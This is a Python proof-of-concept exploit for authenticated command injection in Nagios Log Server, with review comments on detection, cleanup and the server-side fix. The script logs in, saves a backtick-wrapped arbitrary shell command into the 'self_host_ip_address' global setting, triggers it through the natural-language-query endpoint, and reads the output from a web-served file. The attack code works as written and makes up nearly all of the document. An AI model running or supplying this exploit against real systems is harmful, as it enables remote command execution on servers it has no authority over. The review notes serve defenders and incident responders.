import requests
import sys
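## Usage
# $ python3 exploit.py <nagios-logserver-url> <username> <password> <command>
#
# Proof of concept for an authenticated command injection in Nagios Log Server.
# Flow, as implemented below:
#   1. GET the login page to obtain the `csrf_ls` cookie, then log in.
#   2. POST the global-settings form with `self_host_ip_address` set to a
#      backtick-wrapped command.
#   3. GET the natural-language-query endpoint, which the script relies on to
#      make the server use the saved value.
#   4. GET scripts/test.txt, where the redirected command output was written.
#
# URLs are built by plain concatenation, so <nagios-logserver-url> has to end
# with a slash.
#
# Review notes (detection and cleanup):
#   * The run changes persistent global settings (natural_language_query,
#     ai_provider, self_host_ip_address, ai_port) and never restores them, and
#     it leaves test.txt in the web-served scripts directory. Both need to be
#     reverted/removed after a test; both are also artefacts to look for
#     during incident response.
#   * In web access logs the sequence is a POST to nagioslogserver/admin/globals,
#     a GET to nagioslogserver/dashboard/natural_language_to_query, then a GET
#     of nagioslogserver/scripts/test.txt.
#   * A `self_host_ip_address` value containing backticks or other shell
#     metacharacters is never legitimate; the server-side fix is to accept only
#     an IP address or hostname there and to keep the value out of any shell
#     command line. The fixed product version is not named on this page.

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
cmd = sys.argv[4]

# NOTE(review): every request, including the login POST that carries the
# password, is routed through a local intercepting proxy on 127.0.0.1:8080,
# and certificate verification is switched off further down. The script fails
# to connect when nothing is listening on that port.
proxies = dict.fromkeys(['http', 'https'], 'http://127.0.0.1:8080')

login_url = f'{host}nagioslogserver/login'
globals_setting_url = f'{host}nagioslogserver/admin/globals'
nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query?query=doesntmatter'
get_output = f'{host}nagioslogserver/scripts/test.txt'

with requests.Session() as s:
    s.proxies.update(proxies)
    s.verify = False  # TLS certificates are not validated for any request

    # The login form expects the CSRF token that the server sets as a cookie.
    csrf_req = s.get(login_url)
    csrf_ls = csrf_req.cookies['csrf_ls']

    login_payload = {
        'csrf_ls': csrf_ls,
        'username': username,
        'password': password
    }
    login_req = s.post(login_url, data=login_payload, allow_redirects=False)
    # A successful login is recognised by the `ls_session` cookie being set.
    if 'ls_session' not in login_req.cookies:
        print("[-] Incorrect credentials")
        sys.exit()

    print("[+] Login worked, adding command injection to self_host_ip_address")
    cmd_injection_payload = {
        "csrf_ls": csrf_ls,
        "natural_language_query": 1,
        "nlp_disclaimer": "on",
        "ai_provider": "self_hosted",
        # This is simply to view command output. Remove and replace with any
        # command you want to execute
        "self_host_ip_address": f"`{cmd}>/var/www/html/nagioslogserver/www/scripts/test.txt`",
        "ai_port": 8000,
        "saveglobals": 1
    }
    cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload)
    if not cmd_injection_res.ok:
        print("[-] Cmd injection probably didn't work")
        sys.exit()
    # The settings page is expected to echo the saved value back; its absence
    # is only reported, not treated as fatal.
    if cmd not in cmd_injection_res.text:
        print("[*] Command didn't show up in the response text, still check if it works...")

    print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}")
    nlq_res = s.get(nlq_url)
    if not nlq_res.ok:
        print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output")

    cmd_out_res = s.get(get_output)
    # Fix: test the response of the output fetch itself. The original re-tested
    # cmd_injection_res, which is always OK at this point, so a missing output
    # file was reported as success.
    if not cmd_out_res.ok:
        print(f"[-] No output for '{cmd}' at {get_output}")
    else:
        print(f"[+] Output of {cmd} located here: {get_output}")
        print(cmd_out_res.text)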